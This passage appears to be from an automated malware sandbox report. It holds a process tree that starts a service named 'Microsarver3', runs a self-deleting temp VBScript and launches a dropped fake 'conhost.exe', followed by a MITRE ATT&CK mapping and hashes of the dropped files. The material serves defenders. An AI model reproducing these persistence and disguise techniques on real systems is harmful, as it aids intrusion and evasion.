C:\Windows\SysWOW64\sc.exesc start Microsarver3⤵
- Launches sc.exe
PID:1540
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
PID:2804
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C6945E12-B248-423D-82A1-A1293C9A561B} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:5452
-
C:\windows\Installer\conhost.exeC:\windows\Installer\conhost.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5372
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵PID:5660
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
44KB
MD5c24315b0585b852110977dacafe6c8c1
SHA1be855cd1bfc1e1446a3390c693f29e2a3007c04e
SHA25615ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13
SHA51281032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2
-
Filesize
155KB
MD5d2fb01629fa2a994fbd1b18e475c9f23
SHA139b026fcde0f6ae2591ab63b7476536c6b18619c
SHA256ce734596c2b760aa4b3f340227dd9ec48204a96cf0464ad1a97ae648b0a40789
SHA51248f6d6ea57f641d652832aa1a525f381521900a956ff73c5af6a12934a50518e410190c2ab4ae0d05b4d28ec989b7100882095195734245972682b2d701c3a06
-
Filesize
20KB
MD590d179a2f46c02bcdf9cf625ea5aa752
SHA13eb0da5a71456c7c2459fa44611ff53cd1b36a15
SHA2566c55b736646135c0acbad702fde64574a0a55a77be3f39287774c7e518de3da9
SHA512cfbe2e8a9ed33cd2d5c4c9b9f0e0839c6aa9e05698eeb96e3095b025d8e511239aaededf65a91141f99f0422f1e7a27e7756c2a278192869c903840b6b1dadd4
-
Filesize
15KB
MD53c2fe2dbdf09cfa869344fdb53307cb2
SHA1b67a8475e6076a24066b7cb6b36d307244bb741f
SHA2560439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
SHA512d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c
-
Filesize
10KB
MD5ba629216db6cf7c0c720054b0c9a13f3
SHA137bb800b2bb812d4430e2510f14b5b717099abaa
SHA25615292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
SHA512c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9
-
Filesize
807KB
MD59a5cec05e9c158cbc51cdc972693363d
SHA1ca4d1bb44c64a85871944f3913ca6ccddfa2dc04
SHA256aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
SHA5128af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94
-
Filesize
11KB
MD52f0a52ce4f445c6e656ecebbcaceade5
SHA135493e06b0b2cdab2211c0fc02286f45d5e2606d
SHA256cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
SHA51288151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1
-
Filesize
3KB
MD5fb82ba8bb7a402b05d06436991b10321
SHA18bd37b56569d25948c9d42d4f0c530532147a9b0
SHA256ff8c9d8c6f16a466d8e598c25829ec0c2fb4503b74d17f307e13c28fd2e99b93
SHA512d73850930296509c42d7b396c64f6868f4b5493968ddd05aaccf5e8858b8a5d8ce05543699607cf8f68d39556598cce435748f27fa45eed3ce4719080939641c
-
Filesize
232KB
MD5f0881d5a7f75389deba3eff3f4df09ac
SHA18404f2776fa8f7f8eaffb7a1859c19b0817b147a
SHA256ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
SHA512f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e
-
Filesize
58KB
MD5838ceb02081ac27de43da56bec20fc76
SHA1972ab587cdb63c8263eb977f10977fd7d27ecf7b
SHA2560259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
SHA512bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22
-
Filesize
29KB
MD53e89c56056e5525bf4d9e52b28fbbca7
SHA108f93ab25190a44c4e29bee5e8aacecc90dab80c
SHA256b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
SHA51232487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6
-
Filesize
9KB
MD583076104ae977d850d1e015704e5730a
SHA1776e7079734bc4817e3af0049f42524404a55310
SHA256cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
SHA512bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8
-
Filesize
57KB
MD56b7276e4aa7a1e50735d2f6923b40de4
SHA1db8603ac6cac7eb3690f67af7b8d081aa9ce3075
SHA256f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
SHA51258e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa
-
Filesize
257B
MD5f1d7bc201440a31aa69e506c2debcde1
SHA11ae645aca7335db68d883576ae7e92b4334fda27
SHA256dda4eefaed660fa7127cf2bdb39707ad4aa740ce75d1c0736ebcf0ea2e93d0c9
SHA512c35577ca7f5144c688e288ad95820ee18ff2694370e4d51b9461ee3baf3716c00aa443730fa8399b64b061f97c63be4bcd5c36d220e897b4d3a6dac1c07d267c
-
Filesize
319B
MD56521a92292ce620a276fc7209dc016de
SHA1d982e10dfa51b0f4c65a713cb85e25c29e28aa5f
SHA256656c6324142ebbc7184792130f9299c6e2a0bfc451f2609ca5947d2bcc5cb288
SHA5123307e8f27639a51ee890434b81333cf5b8b7a0bb889fe007f3e8d70fe96130ad07bc9d9e3667f282ed1c1feafb907d2dfe13ad456060d47c6f644f5539d31855
-
Filesize
3.7MB
MD58b6dcfc38e8a375d3dc41cbef600d82f
SHA11fc76f6f5e685c9addbb90258f1c9203733dd24d
SHA2561e2749471f31a802f45f4fb1d4a7f2d2fb2be16ce5234e1ef5685518941a103a
SHA512f2614ab61eaf56f3c3069abbc989d3314e781e5cef9be14cf045fd671691686ffdba2303c7cce99315dc94ad79bf97a245a190f7c9aab4a111a5f352aa717937
-
Filesize
21B
MD52ddca716eff6ab2f8d96dc3d39527386
SHA14c1c65fa4d6bffe17dc9e04e193adf6db9d0994f
SHA256e0802313e50e2b94580ac045356ea9cbd88106bede5525634964412a7811f52a
SHA5125b2a2f43e431d9637a87726b387819f00c9b3fa4ea7371e844dcdaeb424c32d5ab0106663d0d3f0e17a06d5890303cced8a625d06d04cbf657b6e3de207eb8e3
-
Filesize
24KB
MD5de55a297980c139d8df904d8dc45b6d9
SHA159a1cb27ed00131f113bd02c7e26e5a09a3e3bcd
SHA256e3a8b253202ed4034fe0365f9e7328036ba012951f5de1bddd5072d2b929bd95
SHA512a28e3f839a95715d9cccad1d0b26638fc5ddfd834cc39885211312009af999be2430770a32e8db4a337d201d06d5c682b47af314cdc0e6d62a436771fd964af6
-
Filesize
6KB
MD5e32fe1a70bf390f67a1b3b9574112833
SHA1aaff28a5144b7e72c8243feb2d2a6942054db411
SHA256806d812fc9076b3a39a7bf39065e1b08855ebd546233ac653ffa94449119d9cb
SHA512e3e0295c65314005577439b278a1e70b8263748d2936840ecfb809d7eb1c87a2ef2c729da979596ca0803e98a7a595e9787f7439eafef03663c33eee3bee7f33
-
Filesize
126KB
MD58c80dd97c37525927c1e549cb59bcbf3
SHA14e80fa7d98c8e87facecdef0fc7de0d957d809e1
SHA25685b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
SHA51250e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e
-
Filesize
43KB
MD54420f8917dc320a78d2ef14136032f69
SHA106cd886586835b2bf0d25fba4c898b69e362ba6d
SHA256b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b
SHA512020f0e42cb26b0ec39fbd381e289466509612307e76a0bfd820247d986e9959fe8e68a1cc41dc2a36f8387c61d88a0b0c900d2a406967ebf5c051ad39b026942
-
Filesize
3.5MB
MD54b0696dacce157b7b8975faa7c3ddc84
SHA11c48eabda846639560754ee8a68a3bb43e49d696
SHA256cb09e395304c6fc7b7e88f7df54034da802021b3080716ad8b661e0bf3da152f
SHA5125a842eab912da69ff89e0acfd6ff9196e43a2f3964f70c92b76f7c6c439077cd895aa0374b8b76eff58288454e9dd9114ca60567bcea783ddc1b41467a715e5c